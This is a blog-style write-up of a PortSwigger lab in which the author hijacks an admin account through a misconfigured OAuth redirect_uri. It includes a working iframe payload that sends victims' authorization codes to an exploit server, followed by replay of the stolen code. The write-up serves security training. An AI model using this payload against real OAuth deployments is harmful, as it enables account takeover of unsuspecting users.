OAuth account hijacking via redirect_uri | Jan 7, 2023
Introduction
Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: OAuth account hijacking via redirect_uri! Without further ado, let’s dive in.
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
Background
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users’ accounts.
To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete Carlos.
The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.
You can log in with your own social media account using the following credentials: wiener:peter
.
Exploitation
Home page:
Let’s try to login by clicking the “My account” link:
When we redirected to /social-login
, it’ll send a GET request to /auth
, with parameters:
client_id
:m2jcb3vfzwnsy33idi19v
redirect_uri
:https://0a83006b04184d3dc0c10e90002a0095.web-security-academy.net/oauth-callback
response_type
:code
scope
:openid profile email
In the above response_type
, it’s set to code
, which tells us the OAuth grant type is authorization code.
Also, it’s missing the state
parameter, which helps to prevent CSRF (Cross-Site Request Forgery) attack.
Let’s finish the OAuth flow:
Armed with above information, we can try to modify the redirect_uri
to our exploit server access log via Burp Suite. So we can steal victim’s code
parameter value, and hijack victim’s session.
Let’s test it:
It worked!
Now, we can craft a CSRF payload to steal victim’s code
parameter value:
<html>
<head>
<title>OAuth-3</title>
</head>
<body>
<iframe src="https://oauth-0add009804b34dc2c02b0cae022a0026.web-security-academy.net/auth?client_id=m2jcb3vfzwnsy33idi19v&redirect_uri=https://exploit-0a6700f904744d64c0cf0d3a019c0009.exploit-server.net/log&response_type=code&scope=openid%20profile%20email"></iframe>
</body>
</html>
Note: The OAuth service provider is in a different subdomain.
Exploit server access log:
Nice! We got it!
Now, we can send a GET request to /oauth-callback?code=WbhQtp-Zy9tGAIZQ2GViRUn5RJeeEGXE6GbukOWm_u3
:
I’m user administrator!
Let’s go to the admin panel and deleter user carlos
:
What we’ve learned:
- OAuth account hijacking via redirect_uri